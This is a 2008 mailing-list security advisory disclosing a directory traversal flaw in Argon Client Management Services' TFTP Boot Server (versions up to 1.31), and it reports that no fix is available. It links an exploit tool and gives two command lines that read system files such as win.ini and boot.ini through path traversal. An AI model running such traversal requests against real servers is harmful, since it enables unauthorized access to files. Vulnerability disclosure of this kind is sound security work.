[<prev] [next>] [day] [month] [year] [list]
Message-Id: <20080310224433.a855b33d.aluigi@autistici.org>
Date: Mon, 10 Mar 2008 22:44:33 +0100
From: Luigi Auriemma <aluigi@...istici.org>
To: bugtraq@...urityfocus.com, news@...uriteam.com,
full-disclosure@...ts.grok.org.uk, vuln@...unia.com,
packet@...ketstormsecurity.org
Subject: Directory traversal in Argon Client Management Services 1.31
#######################################################################
Luigi Auriemma
Application: Argon Client Management Services
http://www.argontechnology.com/product.aspx/cid1/43
Versions: <= 1.31 (TFTP Boot Server <= 2.5.3.1)
Platforms: Windows
Bug: directory traversal in TFTP Boot Server
Exploitation: remote
Date: 08 Mar 2008
Author: Luigi Auriemma
e-mail: aluigi@...istici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
>From vendor's website:
"Client Management Services® (CMS) includes all the server-based
services (PXE Server, BOOTP Server) and administration tools needed to
setup an open network boot environment. You can deploy your favorite
third party client management tools in a pre-OS booting phase."
#######################################################################
======
2) Bug
======
The TFTP Boot Server is affected by a classical directory traversal
vulnerability which allows an attacker to download (upload is not
allowed) any file from the disk where is located the tftp folder.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/tftpx.zip
tftpx SERVER ../../windows/win.ini none
tftpx SERVER ..\boot.ini none
#######################################################################
======
4) Fix
======
No fix
#######################################################################
---
Luigi Auriemma
http://aluigi.org
Powered by blists - more mailing lists